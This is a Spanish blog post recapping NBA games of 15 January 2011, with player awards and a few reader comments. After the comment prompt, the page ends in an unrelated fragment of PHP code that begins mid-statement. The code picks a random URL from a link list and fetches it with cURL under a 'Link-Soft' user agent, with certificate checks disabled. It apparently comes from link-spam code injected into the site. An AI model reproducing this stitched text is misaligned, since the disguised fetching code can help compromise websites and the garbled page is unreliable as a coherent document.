La Crónica (15/01/2011)

16 de January de 2011 por txusma

Tercera derrota de los Heat, segunda sin LeBron y sin su carma. Fue casi un mano a mano Derrick Rose vs Dwayne Wade, recordando que hubieran podido llegar a ser compañeros esta campaña de no ser por el pelotazo de Riley. Absolutamente increíble el duelo de pistoleros. Un espectáculo que todos debemos ver sea como sea, así que poned las ADSL a trabajar ahora mismo. Cuidado porque Bosh se lesionó y pueden ser unos días muy difíciles para los chicos de la playa. No queremos destripar mucho más de lo imprescindible. Mucho mejor disfrutad vosotros mismos con el espectáculo.

Orlando hará bien en aprovechar sus balas estos días. Ayer les costó arrancar en Minnesotta pero a los Wolves les dió un apagón física y metafóricamente en la segunda parte. Los Magic cuajaron un partido muy compensado y con Richardson y Redick de estiletes se llevaron el gato al agua. Recompensa triple, porque los Hawks también cayeron en Atlanta a manos de los Rockets, con Aaron Brooks y Jordan Hill destacados saliendo desde el banco.

En el Oeste la noticia fue la vuelta de Nowitzki muy estropeada por errores propios y aciertos ajenos. Una victoria excesivamente cómoda para los Grizzlies. El mejor de Dallas fue Mahinmi. Con esto se resume todo.

Hornets y Nuggets aprovechan su gran estado de forma a costa de Charlotte y Cleveland respectivamente, unos en base a la defensa dejando Nueva Orleans a Charlotte en cifras ofensivas propias de Larry Brown y otros con un deslumbrante ataque otra vez más rondando los 130. Y eso que sólo 12 puntos fueron de Melo.

Para terminar, los Blazers lograron una importantísima victoria ante los Nets; los Raptors no pudieron aprovechar la impresionante actuación de Calderón, perdiendo contra Young y sus Wizards; y los Pistons ganaron a los Kings volviendo a la pomada de postemporada.

PREMIOS

MVP: Derrick Rose fue la punta de lanza de los Bulls en su victoria contra Miami. Sus 34 puntos, 4 rebotes, 8 asistencias y 3 tapones fueron claves para doblegar a Wade y compañía.

Rookie: Parece que en Toronto han encontrado una joyita. 15 puntos y 8 rebotes para Ed Davis, llamado a ser el sustituto de Bosh. Palabras mayores.

Sorpresa: Will Bynum ganó unos minutos de juego debido a la baja de McGrady y los aprovechó debidamente. 18 puntos, 7 asistencias y victoria frente los Kings.

Decepción: Los Hornets ganaron a pesar de Jarrett Jack que no acaba de encontrar su sitio. 1 de 7 en tiros, 1 rebote y 1 asistencia en 17 minutos lo atestiguan. El partido de los Mavs también ha sido de pesadilla.

Esfuerzo en vano: Jose Manuel Calderon se quedó a un solo rebote de conseguir un triple doble finalizando el partido con 21 puntos, 15 asistencias y 9 asistencias, además con fantásticos porcentajes de tiro. Lástima que el esfuerzo no sirviera para doblegar a los Wizards.

Comenta

3 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    Increîble el partido de Calde, lo que hace tener minutos…

      Citar

  2. Viva_Dirk dice:
    #2

    Horrible partido de Dallas que no se a que aspira con Carlisle de verdad, su cuaderno de jugadas ofensivas debe ser una cuartilla. Y claro con todos a gran nivel no se nota tanto, pero con Dirk a un 10%, sin Butler y Kidd haciendo notar su edad, la cosa se complica ante cualquier rival.

      Citar

  3. CAMPO2 dice:
    #3

    Y rudy en decepción? O ya nos tiene acostumbrados

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>